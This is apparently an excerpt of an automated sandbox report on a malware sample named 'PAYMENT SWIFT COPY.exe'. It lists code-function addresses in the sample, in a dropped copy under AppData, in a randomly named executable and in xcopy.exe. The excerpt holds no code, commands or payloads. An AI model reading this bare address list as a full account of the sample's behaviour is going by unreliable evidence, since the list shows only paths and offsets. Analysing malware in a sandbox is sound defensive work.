Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_004169BF
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0040E297
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0040E2A3
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_004023CD
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_004023D0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_004044DA
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0040FF43
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_00402F50
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0040FF3F
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0042EFA3
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A01AA
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019941A2
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019981CC
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D0100
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197A118
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01968158
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01972000
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A03E6
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018EE3F0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199A352
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019602C0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01980274
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A0591
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E0535
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0198E4F6
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01984420
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01992446
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DC7C0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01904750
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E0770
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018FC6E0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E29A0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019AA9A6
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F6962
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018C68B8
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0190E8F0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E2840
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018EA840
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01996BD7
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199AB40
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DEA80
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F8DBF
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DADE0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197CD1F
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018EAD00
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01980CB5
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D0CF2
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E0C00
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0195EFA0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D2FC8
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01900F30
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01982F30
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01922F28
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01954F40
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199CE93
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F2E90
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199EEDB
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199EE26
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E0E59
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018EB1B0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019AB16B
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0191516C
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018CF172
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E70C0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0198F0CC
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019970E9
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199F0E0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0192739A
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199132D
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018CD34C
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E52A0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018FB2C0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019812ED
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018FD2F0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197D5B0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A95C3
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01997571
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199F43F
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D1460
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199F7B0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019916CC
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01925630
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01975910
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E9950
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018FB950
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E38E0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0194D800
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018FFB80
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01955BF0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0191DBF9
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199FB76
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01925AA0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197DAAC
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01981AA3
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0198DAC6
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199FA49
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01997A46
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01953A6C
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018FFDC0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01991D5A
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E3D40
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01997D73
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199FCF2
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01959C32
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E1F92
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199FFB1
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018A3FD2
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018A3FD5
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199FF09
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E9EB0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 9_2_0103DA5C
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0153F172
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0158516C
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01540100
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0155B1B0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0153D34C
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_015533F3
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0156B2C0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_015D02C0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0156D2F0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_015552A0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01550535
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01541460
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01553497
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01574750
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01550770
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0155B730
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0154C7C0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0156C6E0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01559950
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0156B950
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01566962
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01555990
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_015529A0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01552840
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0155A840
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_015BD800
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0157E8F0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_015538E0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01588890
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_015368B8
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0158DBF9
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_015C5BF0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0156FB80
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_015C3A6C
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0154EA80
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01553D40
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0155ED7A
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0155AD00
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01558DC0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0156FDC0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_0154ADE0
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01568DBF
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01550C00
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_015C9C32
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01569C20
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01540CF2
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_015C4F40
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01570F30
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01592F28
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01542FC8
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_01551F92
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe | Code function: 13_2_015CEFA0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01550E5913_2_01550E59
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01562E9013_2_01562E90
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01559EB013_2_01559EB0
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_06877C8B14_2_06877C8B
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_06879C9B14_2_06879C9B
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_068804FB14_2_068804FB
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_068804F714_2_068804F7
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_06877DCF14_2_06877DCF
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_06877DDB14_2_06877DDB
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_06898ADB14_2_06898ADB
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_068822FB14_2_068822FB
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_06879A7714_2_06879A77
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_06879A7B14_2_06879A7B
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_0686E01214_2_0686E012
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F802C015_2_02F802C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FA027415_2_02FA0274
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0E3F015_2_02F0E3F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FC03E615_2_02FC03E6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBA35215_2_02FBA352
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F9200015_2_02F92000
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB81CC15_2_02FB81CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FC01AA15_2_02FC01AA
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB41A215_2_02FB41A2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F8815815_2_02F88158
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F9A11815_2_02F9A118
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EF010015_2_02EF0100
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F1C6E015_2_02F1C6E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EFC7C015_2_02EFC7C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0077015_2_02F00770
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F2475015_2_02F24750
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FAE4F615_2_02FAE4F6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB244615_2_02FB2446
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FA442015_2_02FA4420
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FC059115_2_02FC0591
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0053515_2_02F00535
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EFEA8015_2_02EFEA80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB6BD715_2_02FB6BD7
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBAB4015_2_02FBAB40
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F2E8F015_2_02F2E8F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EE68B815_2_02EE68B8
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0A84015_2_02F0A840
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0284015_2_02F02840
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F029A015_2_02F029A0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FCA9A615_2_02FCA9A6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F1696215_2_02F16962
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBEEDB15_2_02FBEEDB
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F12E9015_2_02F12E90
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBCE9315_2_02FBCE93
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F00E5915_2_02F00E59
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBEE2615_2_02FBEE26
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EF2FC815_2_02EF2FC8
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F7EFA015_2_02F7EFA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F74F4015_2_02F74F40
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F20F3015_2_02F20F30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FA2F3015_2_02FA2F30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F42F2815_2_02F42F28
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EF0CF215_2_02EF0CF2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FA0CB515_2_02FA0CB5
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F00C0015_2_02F00C00
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EFADE015_2_02EFADE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F18DBF15_2_02F18DBF
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F9CD1F15_2_02F9CD1F
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0AD0015_2_02F0AD00
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F1D2F015_2_02F1D2F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FA12ED15_2_02FA12ED
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F1B2C015_2_02F1B2C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F052A015_2_02F052A0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F4739A15_2_02F4739A
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EED34C15_2_02EED34C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB132D15_2_02FB132D
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB70E915_2_02FB70E9
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBF0E015_2_02FBF0E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F070C015_2_02F070C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FAF0CC15_2_02FAF0CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0B1B015_2_02F0B1B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FCB16B15_2_02FCB16B
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EEF17215_2_02EEF172
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F3516C15_2_02F3516C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB16CC15_2_02FB16CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F4563015_2_02F45630
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBF7B015_2_02FBF7B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EF146015_2_02EF1460
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBF43F15_2_02FBF43F
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FC95C315_2_02FC95C3
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F9D5B015_2_02F9D5B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB757115_2_02FB7571
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FADAC615_2_02FADAC6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F45AA015_2_02F45AA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F9DAAC15_2_02F9DAAC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FA1AA315_2_02FA1AA3
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F73A6C15_2_02F73A6C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBFA4915_2_02FBFA49
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB7A4615_2_02FB7A46
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F75BF015_2_02F75BF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F3DBF915_2_02F3DBF9
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F1FB8015_2_02F1FB80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBFB7615_2_02FBFB76
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F038E015_2_02F038E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F6D80015_2_02F6D800
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F0995015_2_02F09950
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F1B95015_2_02F1B950
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F9591015_2_02F95910
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F09EB015_2_02F09EB0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EC3FD515_2_02EC3FD5
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02EC3FD215_2_02EC3FD2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBFFB115_2_02FBFFB1
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F01F9215_2_02F01F92
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBFF0915_2_02FBFF09
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FBFCF215_2_02FBFCF2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F79C3215_2_02F79C32
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F1FDC015_2_02F1FDC0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB7D7315_2_02FB7D73
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02FB1D5A15_2_02FB1D5A
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F03D4015_2_02F03D40
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_00531F2015_2_00531F20
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0052CD7015_2_0052CD70
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0052CD6C15_2_0052CD6C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0052CF9015_2_0052CF90
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0052AF8015_2_0052AF80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0052B0D015_2_0052B0D0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0052B0C415_2_0052B0C4
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0052130715_2_00521307
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_005355F015_2_005355F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_005337F015_2_005337F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_005337EC15_2_005337EC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0054BDD015_2_0054BDD0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0321E35315_2_0321E353
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0321E23515_2_0321E235
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0321D7B815_2_0321D7B8
